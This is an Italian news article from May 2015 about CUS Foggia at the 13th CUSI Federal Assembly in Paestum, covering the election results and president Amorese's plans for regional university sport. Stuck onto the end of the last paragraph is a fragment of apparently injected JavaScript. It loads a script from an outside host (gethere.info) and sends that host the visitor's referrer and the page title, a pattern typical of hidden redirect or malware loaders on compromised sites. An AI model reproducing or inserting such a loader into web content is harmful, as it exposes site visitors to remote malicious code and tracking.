.
News
  • Home

Il Cus Foggia a Paestum per la XIII Assemblea Federale del Cusi. Amorese: “Lavoriamo per potenziare l’attività sportiva universitaria”

di trarre 0
04 Mag 2015

Rinnovati gli Organi di Governo del Centro Sportivo Universitario Italiano, soddisfazione per l’elezione della vicepresidente del CusFoggia Maria Assunta Doddi

 

Si è svolta sabato 2 maggio presso l’Hotel Ariston di Paestum laXIII Assemblea Federale C.U.S.I. (Centro Universitario Sportivo Italiano). Ai lavori assembleari, preceduti da una tavola rotonda introduttiva moderata dal giornalista dell’emittente La7Andrea Pancani, ha preso parte anche il presidente del CusFoggia Claudio Amorese accompagnato dal segretario Claudio D’Agnello.

All’ordine del giorno le votazioni, da parte dei Cus, per  il rinnovo delle cariche degli Organi di Governo del CUSI in carica per il prossimo quadriennio 2015/2019. L’avvocato Lorenzo Lentini, con 124 voti, è stato confermato alla presidenza del Centro Universitario Sportivo Italiano. Rappresentante degli atleti sarà Luigi Mazzone, mentre presidente del Collegio Sindacale è stato nominato Danilo Zantedeschi, già presidente del Centro Universitario Sportivo di Verona.

Del Collegio Sindacale farà parte anche la vicepresidente del Cus Foggia, Maria Assunta Doddi, eletta membro supplente con 125 voti. Un riconoscimento importante che testimonia l’impegno e la crescita a livello organizzativo ed istituzionale del Cus Foggia. Durante i lavori dell’assemblea è stata ribadita l’importanza di continuare a promuovere una stretta collaborazione tra i Cus, il Coni e la Conferenza dei Rettori. Una sinergia che, grazie alla recente istituzione di una Commissione Paritetica Rettori sul tema dello Sport universitario e all’aumento dello stanziamento di fondi relativo alla 394/77 nella Legge di Stabilità 2015, ha fatto già registrare i primi significativi risultati.
“E’ stata un’occasione importante per avviare nuovi contatti con gli altri Cus d’Italia e per confrontarsi sulle varie iniziative da proporre” ha commentato il presidente Amorese a margine della due giorni di Paestum. “In particolare il nostro principale obiettivo è portare all’attenzione della Regione Puglia l’emanazione di una legge, sulla scorta delle 394/77 di respiro nazionale, per il Potenziamento dell’attività sportiva universitaria che permetta di sostenere e incrementare l’attività sportiva su base regionale”.
Il presidente del Cus ha inoltre gettato le basi per quella che potrebbe essere un’iniziativa importante e che potrebbe realizzarsi anche grazie al sostegno del CUSI e dell’Università di Foggia: “Abbiamo lanciato l’idea di poter ospitare nella nostra città l’Assemblea Federale del 2016. Una proposta ambiziosa che speriamo possa essere accolta. Riteniamo doveroso creare a Foggia e nell’intero territorio di Capitanata i presupposti per un’offerta formativa e sportiva di più ampio respiro e, al contempo, lavorare per dare al Cus Foggia un ruolo più solido e concreto all’interno degli organi direttivi del Cusi”.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;